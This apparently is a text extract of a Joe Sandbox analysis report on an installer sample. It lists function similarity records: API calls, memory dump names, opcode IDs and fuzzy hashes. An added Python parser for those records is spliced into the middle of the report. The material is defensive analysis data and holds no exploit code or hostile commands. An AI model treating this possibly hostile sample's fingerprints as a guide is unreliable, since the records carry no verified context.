                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \j`7$\j`7$j
                                      • API String ID: 0-3644614255
                                      • Opcode ID: 718ab6eea95bba6659085bcdcf09c4864dd31129e1cac34ee6c0e6e7f65ac399
                                      • Instruction ID: 7315c284d44eca6b86ed36a700b4dae80733831c792335c14712d84dd6244dc0
                                      • Opcode Fuzzy Hash: 718ab6eea95bba6659085bcdcf09c4864dd31129e1cac34ee6c0e6e7f65ac399
                                      • Instruction Fuzzy Hash: 004224746093828FCB25CF68D48066ABBE1BFEA354F244A1EE499C7762D334D845CB53
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBFB4B1
                                        • Part of subcall function 6CBFC93B: __EH_prolog.LIBCMT ref: 6CBFC940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: 1$`)K$h)K
                                      • API String ID: 3519838083-3935664338
                                      • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                      • Instruction ID: e11cf8ddd8629e067c3e8305d35ef6ed2c24f47cb89700f9fa4f6b7b3da6d3ba
                                      • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                      • Instruction Fuzzy Hash: 8CF27B70904288DFDB21DBA8C884BDDBBB5EF49308F244499E459EB741DB719E8ACF11
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBEDEF4
                                        • Part of subcall function 6CBF1622: __EH_prolog.LIBCMT ref: 6CBF1627
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: $h%K
                                      • API String ID: 3519838083-1737110039
                                      • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                      • Instruction ID: a0253bf370790fb28637e957a95a31b3d6de02a4750f00b0ec4f4a11773762e1
                                      • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                      • Instruction Fuzzy Hash: 29537730901298DFDF15CBA4C994BEDBBB4AF09308F2440D9D459A7791DB70AE8ACF52
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBC9CE5
                                        • Part of subcall function 6CB9FC2A: __EH_prolog.LIBCMT ref: 6CB9FC2F
                                        • Part of subcall function 6CBA16A6: __EH_prolog.LIBCMT ref: 6CBA16AB
                                        • Part of subcall function 6CBC9A0E: __EH_prolog.LIBCMT ref: 6CBC9A13
                                        • Part of subcall function 6CBC9837: __EH_prolog.LIBCMT ref: 6CBC983C
                                        • Part of subcall function 6CBCD143: __EH_prolog.LIBCMT ref: 6CBCD148
                                        • Part of subcall function 6CBCD143: ctype.LIBCPMT ref: 6CBCD16C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog$ctype
                                      • String ID:
                                      • API String ID: 1039218491-3916222277
                                      • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                      • Instruction ID: a35e37952689e0e125f2cf0b8d58ec2337a738f0f0dacc22ee72c51ff458c21a
                                      • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                      • Instruction Fuzzy Hash: FE039C30A052D8DFDF15DFA4C890BECBBB0AF16308F1440A9D44967691DB74AA89DF63
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: W
                                      • API String ID: 3519838083-655174618
                                      • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                      • Instruction ID: 1c095148765ad5641f372a8b84e56950135e064981b3ce96f87ec8e708130111
                                      • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                      • Instruction Fuzzy Hash: 1EB27A74A01299DFDB01CFA8C584B9EBBB4EF09308F244099E865EB741C775D94ACF62
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6CB73969
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6CB73973
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6CB73980
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: ecb1efac2f4f65c5deca33864bbaa0f9542fc986b7d16cae4729d94bf2c42afe
                                      • Instruction ID: 44e2c0cc3b0cb7706962856b4f99c4a91d945f3498da86b9dc12cecd3fa4e249
                                      • Opcode Fuzzy Hash: ecb1efac2f4f65c5deca33864bbaa0f9542fc986b7d16cae4729d94bf2c42afe
                                      • Instruction Fuzzy Hash: 6131E4759012289BCB21DF65D988BCDBBF8FF08314F5041EAE81CA7650EB709B858F55
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,6CB72925,?,?,?,?), ref: 6CB7288F
                                      • TerminateProcess.KERNEL32(00000000,?,6CB72925,?,?,?,?), ref: 6CB72896
                                      • ExitProcess.KERNEL32 ref: 6CB728A8
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: bea96464e22ef60401098293ba0c6f54643e77a31c844df997d6507c0d1f1e40
                                      • Instruction ID: 51d3fb55f0fcdb1afb5328235721f7aa3fc3b16ea416add845ac23100fbd4e30
                                      • Opcode Fuzzy Hash: bea96464e22ef60401098293ba0c6f54643e77a31c844df997d6507c0d1f1e40
                                      • Instruction Fuzzy Hash: F1E04F31100144EBCF116F50C90CA5C3BB8FF46746B104414F82497520CB76E981CB95
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-3916222277
                                      • Opcode ID: 6283ffce90d7722d82f06bf6062908a4dbdb23c6aa848be1631664cf1bbb550b
                                      • Instruction ID: 0cef9225e316b4c73021221a7ba8f26a19a5062a6a352e47ebb2d81e2377284c
                                      • Opcode Fuzzy Hash: 6283ffce90d7722d82f06bf6062908a4dbdb23c6aa848be1631664cf1bbb550b
                                      • Instruction Fuzzy Hash: 06929E3090129ADFDB04CFA8C858BEEBBB0FF09748F244199E815AB751CB75AD45CB52
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-3916222277
                                      • Opcode ID: bf6cc7e3d5e08887c52fb4d73b2e2a9274b9cdfd61b6f8eb1b64b386a2eecc6f
                                      • Instruction ID: 866745d06116978b8aa91cd2f8e55c5a72cd3fdca2c72764f7196bb94e70c5cb
                                      • Opcode Fuzzy Hash: bf6cc7e3d5e08887c52fb4d73b2e2a9274b9cdfd61b6f8eb1b64b386a2eecc6f
                                      • Instruction Fuzzy Hash: EA225A70A002499FDB04CFA8C494BADBBF0FF48308F108569E8699B751D775E94ACF94
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBE789B
                                        • Part of subcall function 6CBE8FC9: __EH_prolog.LIBCMT ref: 6CBE8FCE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: @ K
                                      • API String ID: 3519838083-4216449128
                                      • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                      • Instruction ID: 1d17b408506dd66e121e2b0696b207827a0d1c28c0a1b8657d2c62048594920c
                                      • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                      • Instruction Fuzzy Hash: 56D10230D002949FDB14CFA4C490BDDB7B6FF88B98F24816AD405BBB86C7B09945CB52
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: x=J
                                      • API String ID: 3519838083-1497497802
                                      • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                      • Instruction ID: fc3430653d326190363a9e7423452f7e117102ef00920ef77224013f091b98d5
                                      • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                      • Instruction Fuzzy Hash: D091E031D05299DBCF04EFA4D890AEDBBB5FF07308F20807AD46267A51DB31594ACB96
                                      APIs
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CB6AFA0
                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CB6B7C3
                                        • Part of subcall function 6CB6CA69: RaiseException.KERNEL32(E06D7363,00000001,00000003,6CB6B7AC,00000000,?,?,?,6CB6B7AC,?,6CB9853C), ref: 6CB6CAC9
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                                      • String ID:
                                      • API String ID: 915016180-0
                                      • Opcode ID: f220899bae2c177bf8fee0aae061286150441ea8b3544fb7d0802721bc683824
                                      • Instruction ID: 3523394891c735374fd4bda2cb855c6f5595e58cabd2864de4e7af880fd66533
                                      • Opcode Fuzzy Hash: f220899bae2c177bf8fee0aae061286150441ea8b3544fb7d0802721bc683824
                                      • Instruction Fuzzy Hash: 56B18CB2A056499FDF04CF67C9816AEBBB4FB09318F24862AE415E7F80D7349644CF90
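The function records above follow a fixed layout once the report is extracted to plain text: section headers (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) followed by bullet lines, with "Instruction Fuzzy Hash" closing each record. The parser below is an added example, not part of the Joe Sandbox report or its tooling; it turns the records into structured entries so the Opcode IDs and API IDs can be grouped or matched against other samples, and it flags functions whose API list shows the MSVC C++ throw pattern (RaiseException with the exception code E06D7363, as in the record directly above). The sample text is a constructed copy of two records from this page; the "Download File" link label that the extraction fused onto the associated dump names is stripped during parsing.

```python
"""Parse Joe Sandbox 'Similarity' function records from extracted report text.

Added example; the record layout is taken from the report as it appears in
plain text, and SAMPLE is a constructed copy of two records from this page.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# "Name.MODULE(args), ref: ADDR", optionally prefixed by the subcall marker.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>[^\s(]+)\.(?P<module>[A-Z][A-Z0-9_]*)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")

# Exception code the MSVC runtime passes to RaiseException for a C++ 'throw'.
MSVC_CXX_EXCEPTION = "E06D7363"

LINK_LABEL = "Download File"   # widget text fused onto dump file names

SAMPLE = """\
APIs
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CB6AFA0
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CB6B7C3
  • Part of subcall function 6CB6CA69: RaiseException.KERNEL32(E06D7363,00000001,00000003,6CB6B7AC,00000000,?,?,?,6CB6B7AC,?,6CB9853C), ref: 6CB6CAC9
Memory Dump Source
• Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
• Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
Similarity
• API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
• String ID:
• API String ID: 915016180-0
• Opcode ID: f220899bae2c177bf8fee0aae061286150441ea8b3544fb7d0802721bc683824
• Instruction ID: 3523394891c735374fd4bda2cb855c6f5595e58cabd2864de4e7af880fd66533
• Opcode Fuzzy Hash: f220899bae2c177bf8fee0aae061286150441ea8b3544fb7d0802721bc683824
• Instruction Fuzzy Hash: 56B18CB2A056499FDF04CF67C9816AEBBB4FB09318F24862AE415E7F80D7349644CF90
APIs
• __EH_prolog.LIBCMT ref: 6CBB840F
  • Part of subcall function 6CBB9137: __EH_prolog.LIBCMT ref: 6CBB913C
Memory Dump Source
• Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
• Instruction ID: 1a707cac8cf8e8f2b3d28494ad31bf82cbec96d5ce538f599bea7893fb6ea860
• Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
• Instruction Fuzzy Hash: 2062577090429ACFDB15CFA4C890BEEBBB5FF04308F14416AE819BB680DB759A45CF91
"""


@dataclass
class FunctionRecord:
    fields: dict = field(default_factory=dict)       # Similarity and dump fields
    associated: list = field(default_factory=list)   # extra dump files
    apis: list = field(default_factory=list)         # parsed API call lines


def _parse_api(text):
    """Split an API bullet into name/module/args/ref (and caller for subcalls)."""
    m = API_RE.match(text)
    if not m:
        return {"raw": text}
    d = m.groupdict()
    d["args"] = d["args"].split(",") if d["args"] else []
    return d


def parse_records(text):
    records, current, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            current.apis.append(_parse_api(body))
            continue
        key, _, value = body.partition(":")
        key, value = key.strip(), value.strip()
        if value.endswith(LINK_LABEL):
            value = value[:-len(LINK_LABEL)].rstrip()
        if key == "Associated":
            current.associated.append(value)
        else:
            current.fields[key] = value
        if key == "Instruction Fuzzy Hash":   # last bullet of every record
            records.append(current)
            current = FunctionRecord()
    return records


def group_by(records, key):
    """Map each distinct value of `key` (e.g. 'API ID') to the Opcode IDs sharing it."""
    groups = defaultdict(list)
    for r in records:
        groups[r.fields.get(key, "")].append(r.fields.get("Opcode ID", ""))
    return dict(groups)


def _throws_cxx(api):
    return (api.get("name") == "RaiseException" and bool(api.get("args"))
            and api["args"][0] == MSVC_CXX_EXCEPTION)


def msvc_throw_records(records):
    """Opcode IDs of functions that raise a C++ exception directly or via a subcall."""
    return [r.fields["Opcode ID"] for r in records if any(_throws_cxx(a) for a in r.apis)]
```

Grouping by "API ID" or "API String ID" with `group_by` gives the cross-function view the report lists one record at a time; feeding the extracted text of a second report to `parse_records` and intersecting the Opcode ID sets is the simplest pivot between samples.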
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @4J$DsL
                                      • API String ID: 0-2004129199
                                      • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                      • Instruction ID: 9499f6548ef02e83c308a1f1dad106ee9e05b0a88f3cb7920f4ff7230cc11a59
                                      • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                      • Instruction Fuzzy Hash: 102171377A49564BE74CCA28EC33EB926D0E745305B89627EE94BCB7E1DF5D8800C648
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBB840F
                                        • Part of subcall function 6CBB9137: __EH_prolog.LIBCMT ref: 6CBB913C
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                      • Instruction ID: 1a707cac8cf8e8f2b3d28494ad31bf82cbec96d5ce538f599bea7893fb6ea860
                                      • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                      • Instruction Fuzzy Hash: 2062577090429ACFDB15CFA4C890BEEBBB5FF04308F14416AE819BB680DB759A45CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: YA1
                                      • API String ID: 0-613462611
                                      • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                      • Instruction ID: 8e61faad7eb8fcfda60d10dd8fdb9dd20b834fe0970259e7233e63d3f2d37da4
                                      • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                      • Instruction Fuzzy Hash: EE42D27060D3818FD315CF2AC49069ABBE2FFD9308F14896DE8D58BB42E675D906CB42
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: a13d6ee194fb01fface67b9907b125463793f568477540394d21f6f384e52076
                                      • Instruction ID: ec3904e56e4d9a7e00e9d7bd2a08003a941dd09901c1e17d68d0b2414023cb7b
                                      • Opcode Fuzzy Hash: a13d6ee194fb01fface67b9907b125463793f568477540394d21f6f384e52076
                                      • Instruction Fuzzy Hash: 64E17C716087558FC724CF25D880AAAB7F5BFC8318F248A2EE858CB755E7309945CB92
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                                      • Instruction ID: 916a206c8437f84ef2b5a97ecc555569e5b95852f34afdb5ed583f7ded2fa158
                                      • Opcode Fuzzy Hash: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                                      • Instruction Fuzzy Hash: B9F13570900389DFCB14CFA8C590BEEBBB1FF09758F148169D449ABA52D770AA89CF51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                                      • Instruction ID: 444ec4001b872aca9238f5f143368e624d230379d66f261763673217fce901c1
                                      • Opcode Fuzzy Hash: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                                      • Instruction Fuzzy Hash: 35324AB1A083058FC318CF56C48495AF7E2BFCC314F468A5DE98997355DB74AA09CF86
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: __aullrem
                                      • String ID:
                                      • API String ID: 3758378126-0
                                      • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                      • Instruction ID: 71dd4e1fe8cfd2849cec63c523669d13bd429f48a6a3e8016e67b5453f198391
                                      • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
